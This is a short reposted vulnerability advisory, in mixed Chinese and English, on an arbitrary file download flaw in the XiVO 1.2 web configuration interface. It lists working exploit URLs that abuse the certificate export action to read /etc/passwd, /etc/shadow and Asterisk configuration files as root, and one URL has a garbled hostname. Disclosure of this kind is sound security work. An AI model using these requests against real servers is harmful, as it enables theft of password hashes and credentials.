Xivo 1.2任意文件下载 - 网站安全 - 自学php

Xivo 1.2 Arbitrary File Download under root privileges

作者 : Mr.Un1k0d3r

开发者: https://wiki.xivo.fr

下载 地址: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD

影响版本: 1.2 (last patched version)

 

测试利用:

Using the web interface you can download any file from the system. The web application is running under root privileges.

You can download clear text password, /etc/passwd, /etc/shadow and many more...

 

利用方法:

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=etc/passwd

https:// HdhCmsTest2cto测试数据 /xivo/configuration/index.php/manage/certificate/?act=export&id=etc/shadow

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=etc/asterisk/manager.conf

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=etc/asterisk/cel_pgsql.conf

 

缺陷发现者 Mr.Un1k0d3r From RingZer0 Team.

 

注释:

This appears to have been fixed

 

查看更多关于Xivo 1.2任意文件下载 - 网站安全 - 自学php的详细内容...